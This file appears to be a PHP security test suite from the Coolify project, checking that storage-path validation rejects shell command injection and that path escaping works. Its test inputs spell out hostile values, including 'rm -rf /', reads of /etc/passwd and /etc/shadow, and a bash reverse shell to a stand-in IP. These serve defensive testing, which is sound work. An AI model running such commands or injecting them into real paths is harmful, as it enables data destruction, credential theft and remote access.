mirror of
https://github.com/coollabsio/coolify.git
synced 2025-12-28 13:41:51 +00:00
94 lines
3.3 KiB
PHP
94 lines
3.3 KiB
PHP
<?php
|
|
|
|
/**
|
|
* File Storage Security Tests
|
|
*
|
|
* Tests to ensure file storage directory mount functionality is protected against
|
|
* command injection attacks via malicious storage paths.
|
|
*
|
|
* Related Issues: #6 in security_issues.md
|
|
* Related Files:
|
|
* - app/Models/LocalFileVolume.php
|
|
* - app/Livewire/Project/Service/Storage.php
|
|
*/
|
|
test('file storage rejects command injection in path with command substitution', function () {
|
|
expect(fn () => validateShellSafePath('/tmp$(whoami)', 'storage path'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('file storage rejects command injection with semicolon', function () {
|
|
expect(fn () => validateShellSafePath('/data; rm -rf /', 'storage path'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('file storage rejects command injection with pipe', function () {
|
|
expect(fn () => validateShellSafePath('/app | cat /etc/passwd', 'storage path'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('file storage rejects command injection with backticks', function () {
|
|
expect(fn () => validateShellSafePath('/tmp`id`/data', 'storage path'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('file storage rejects command injection with ampersand', function () {
|
|
expect(fn () => validateShellSafePath('/data && whoami', 'storage path'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('file storage rejects command injection with redirect operators', function () {
|
|
expect(fn () => validateShellSafePath('/tmp > /tmp/evil', 'storage path'))
|
|
->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('/data < /etc/shadow', 'storage path'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('file storage rejects reverse shell payload', function () {
|
|
expect(fn () => validateShellSafePath('/tmp$(bash -i >& /dev/tcp/10.0.0.1/8888 0>&1)', 'storage path'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('file storage escapes paths properly', function () {
|
|
$path = "/var/www/app's data";
|
|
$escaped = escapeshellarg($path);
|
|
|
|
expect($escaped)->toBe("'/var/www/app'\\''s data'");
|
|
});
|
|
|
|
test('file storage escapes paths with spaces', function () {
|
|
$path = '/var/www/my app/data';
|
|
$escaped = escapeshellarg($path);
|
|
|
|
expect($escaped)->toBe("'/var/www/my app/data'");
|
|
});
|
|
|
|
test('file storage escapes paths with special characters', function () {
|
|
$path = '/var/www/app (production)/data';
|
|
$escaped = escapeshellarg($path);
|
|
|
|
expect($escaped)->toBe("'/var/www/app (production)/data'");
|
|
});
|
|
|
|
test('file storage accepts legitimate absolute paths', function () {
|
|
expect(fn () => validateShellSafePath('/var/www/app', 'storage path'))
|
|
->not->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('/tmp/uploads', 'storage path'))
|
|
->not->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('/data/storage', 'storage path'))
|
|
->not->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('/app/persistent-data', 'storage path'))
|
|
->not->toThrow(Exception::class);
|
|
});
|
|
|
|
test('file storage accepts paths with underscores and hyphens', function () {
|
|
expect(fn () => validateShellSafePath('/var/www/my_app-data', 'storage path'))
|
|
->not->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('/tmp/upload_dir-2024', 'storage path'))
|
|
->not->toThrow(Exception::class);
|
|
});
|